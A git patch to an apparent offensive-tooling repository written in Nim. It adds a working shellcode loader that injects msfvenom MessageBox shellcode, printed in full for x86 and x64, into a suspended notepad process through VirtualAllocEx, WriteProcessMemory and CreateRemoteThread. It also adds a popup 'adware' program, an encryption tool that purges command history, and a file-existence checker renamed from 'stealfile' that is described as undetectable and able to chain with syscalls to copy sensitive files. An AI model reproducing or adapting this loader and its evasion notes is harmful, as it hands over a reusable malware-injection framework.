From 59512d7b642de0146326f97401cf3b80c5dda296 Mon Sep 17 00:00:00 2001 From: eline <151952925+elineersenoyeva@users.noreply.github.com> Date: Wed, 29 Nov 2023 13:37:44 +0100 Subject: [PATCH] [S] worked on nim. added changes to NIM docs. --- README.md | 12 +- elinethingz/README.md | 20 ++- .../security/packer/OFFENSIVEencfile.nim | 2 + elinethingz/security/packer/packer.nim | 152 ++++++++++++------ elinethingz/utils/basicadware.nim | 16 +- .../utils/{stealfile.nim => checkfile.nim} | 7 +- 6 files changed, 135 insertions(+), 74 deletions(-) rename elinethingz/utils/{stealfile.nim => checkfile.nim} (53%) diff --git a/README.md b/README.md index 2832d16..954799e 100644 --- a/README.md +++ b/README.md @@ -3,13 +3,13 @@ Phorcy **Warning** > This Tool is for educational purposes only. - +Do not release. **Note** -> Coding Languages: NIM; Python; Javascript. -> Working Status: Unfinished +> Programming languages: NIM; C++, Python; Javascript. +> Status: Unfinished > Date finished: N/A > Title: Phorcy > Description: ... - - - +> Main developers: Synthetic; Cat ;Eline +Contains numerous new tools in NIM (tested on v. 2.0.0 unless written otherwise) that implement very important features for a project like this. +Last updated: 29th November 2023. Time: Morning in Europe. diff --git a/elinethingz/README.md b/elinethingz/README.md index 4c48f15..c055a5a 100644 --- a/elinethingz/README.md +++ b/elinethingz/README.md @@ -11,13 +11,9 @@ format: [seq[byte]](@[0x40,0x80] -# mic_reg.nim - -[Broken] -Checks if Windows OSD is enabled. # encfile.nim -Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024. +Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data. Has a fingerprint/is detectable. # OFFENSIVEencfile.nim Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size. @@ -28,4 +24,16 @@ Ideally a "packer"/loader for the main stage. Still very experimental and needs # bsod.nim -Serves a BSOD to targets on Windows. \ No newline at end of file +Serves a BSOD to targets on Windows. + +# mic_reg.nim + +[Broken] +Checks if Windows OSD is enabled. + +# checkfile.nim +Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions. +Can be chained with other direct syscalls to copy sensitive files. + +# basicadware.nim +Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool. diff --git a/elinethingz/security/packer/OFFENSIVEencfile.nim b/elinethingz/security/packer/OFFENSIVEencfile.nim index a595a32..cd6c609 100644 --- a/elinethingz/security/packer/OFFENSIVEencfile.nim +++ b/elinethingz/security/packer/OFFENSIVEencfile.nim @@ -20,6 +20,8 @@ # i.e ./offensiveencfile input output password # or maybe only get password interactively. hmm... +# WARNING: +# This program purges command history on Windows. import nimcrypto import std/sysrand diff --git a/elinethingz/security/packer/packer.nim b/elinethingz/security/packer/packer.nim index 23c9c30..cc8d984 100644 --- a/elinethingz/security/packer/packer.nim +++ b/elinethingz/security/packer/packer.nim @@ -7,70 +7,118 @@ # see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/pop_bin.nim # see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/shellcode_bin.nim -import os -import system - -const - MEM_COMMIT = 0x1000 - MEM_RESERVE = 0x2000 - PAGE_EXECUTE_READWRITE = 0x40 - -type - HANDLE* = int - HWND* = HANDLE - UINT* = int32 - LPCSTR* = cstring - -proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): int32 - {.discardable, stdcall, dynlib: "user32", importc: "MessageBoxA".} - -MessageBox(0, "Hello, world !", "Nim is Powerful", 0) -#  LPVOID VirtualAllocEx( -#  [in] HANDLE hProcess, -#  [in, optional] LPVOID lpAddress, BUT IF NULL: automatically calculated -#  [in] SIZE_T dwSize, is an int? size in bytes of memory region. "The size of the region of memory to allocate, in bytes." -#  [in] DWORD flAllocationType, see https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex -#  [in] DWORD flProtect -#  ); +import winim/lean +import osproc -# proc NimVirtualAllocEx*(hWnd: HWND, lpAddress: pointer, dwSize: LPCSTR, uType: UINT): int32 -# {.discardable, stdcall, dynlib: "user32", importc: "VirtualAllocEx".} +proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void = + # Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D + let tProcess = startProcess("notepad.exe") # notepad is in PATH. change with whatever the loader loaded. + tProcess.suspend() # That's handy! + defer: tProcess.close() -# Declare the VirtualAlloc function from Windows API -proc VirtualAlloc*(addr: pointer void, size: csize_t, allocType: cuint, protect: cuint): pointer cvoid {.importwinapi: "VirtualAlloc".} + echo "[*] Target Process: ", tProcess.processID -# Declare a simple function that will be loaded into the allocated memory -proc helloWorld() = - echo "Hello, World from allocated memory!" + let pHandle = OpenProcess( + PROCESS_ALL_ACCESS, + false, + cast[DWORD](tProcess.processID) + ) + defer: CloseHandle(pHandle) -# Main procedure -proc main(): int = - # Calculate the size needed for the function - let codeSize = procSize(helloWorld) + echo "[*] pHandle: ", pHandle - # Allocate memory using VirtualAlloc - let allocatedMemory = VirtualAlloc(nil, codeSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE) - if allocatedMemory == nil: - echo "Failed to allocate memory." - return 1 # Return an error code + let rPtr = VirtualAllocEx( + pHandle, + NULL, + cast[SIZE_T](shellcode.len), + MEM_COMMIT, + PAGE_EXECUTE_READ_WRITE + ) - # Copy the function code to the allocated memory - memcpy(allocatedMemory, addr(helloWorld), codeSize) + var bytesWritten: SIZE_T + let wSuccess = WriteProcessMemory( + pHandle, + rPtr, + unsafeAddr shellcode, + cast[SIZE_T](shellcode.len), + addr bytesWritten + ) - # Cast the allocated memory to a function pointer - let funcPointer: proc() {.cdecl.} = cast[proc()](allocatedMemory) + echo "[*] WriteProcessMemory: ", bool(wSuccess) + echo " \\-- bytes written: ", bytesWritten + echo "" - # Execute the function in the allocated memory - funcPointer() + let tHandle = CreateRemoteThread( + pHandle, + NULL, + 0, + cast[LPTHREAD_START_ROUTINE](rPtr), + NULL, + 0, + NULL + ) + defer: CloseHandle(tHandle) - # Deallocate the memory (optional) - os.free(allocatedMemory) + echo "[*] tHandle: ", tHandle + echo "[+] Injected" - return 0 # Return 0 to indicate successful execution +when defined(windows): -when isMainModule: - main() + # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler + when defined(i386): + # ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays + echo "[*] Running in x86 process" + var shellcode: array[272, byte] = [ + byte 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b, + 0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b, + 0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24, + 0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a, + 0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0, + 0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c, + 0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a, + 0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2, + 0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f, + 0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52, + 0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33, + 0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89, + 0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c, + 0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67, + 0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3, + 0x68,0x58,0x20,0x20,0x20,0x68,0x4d,0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20, + 0x68,0x6f,0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9,0x88,0x4c,0x24, + 0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff, + 0x55,0x08] + + elif defined(amd64): + # ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays + echo "[*] Running in x64 process" + var shellcode: array[295, byte] = [ + byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, + 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, + 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, + 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, + 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, + 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, + 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, + 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, + 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, + 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, + 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, + 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, + 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, + 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, + 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, + 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d, + 0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, + 0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c, + 0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d, + 0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00] + + # equivalent of 'if __name__ == '__main__' in python + # when isMainModule: + # injectCreateRemoteThread(shellcode) +injectCreateRemoteThread(shellcode) \ No newline at end of file diff --git a/elinethingz/utils/basicadware.nim b/elinethingz/utils/basicadware.nim index 20bf42b..e5873c3 100644 --- a/elinethingz/utils/basicadware.nim +++ b/elinethingz/utils/basicadware.nim @@ -20,12 +20,14 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in var titlemessages = @["Are you really free?", - "Window on the street, only mesmerized and pondering... Am I in the right?"] - captionmessages = @["From the river to the sea, Palestine will be free.", - "I believe and have faith in you."] - + "Poland!"] + captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.", + "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings randomize() # seeds randomizer -var - randomtitle:string = sample(titlemessages) - randommessage:string = sample(captionmessages) +var + randomtitle:cstring = sample(titlemessages).cstring + randommessage:cstring = sample(captionmessages).cstring + +if isMainModule: + MessageBox(0, randomtitle, randommessage, 0) diff --git a/elinethingz/utils/stealfile.nim b/elinethingz/utils/checkfile.nim similarity index 53% rename from elinethingz/utils/stealfile.nim rename to elinethingz/utils/checkfile.nim index 72fc7c3..ec34690 100644 --- a/elinethingz/utils/stealfile.nim +++ b/elinethingz/utils/checkfile.nim @@ -4,8 +4,9 @@ proc fileExists(filename: cstring): bool = result = GetFileAttributesA(filename) != INVALID_FILE_ATTRIBUTES const - filename = "C:\\path\\to\\your\\file.txt" + filename = "C:\\path\\to\\your\\file.txt" # double-\ because it's an escape character. if fileExists(filename): - echo "The file exists!" + echo "File exists." else: - echo "The file does not exist." + echo "File does not exist." +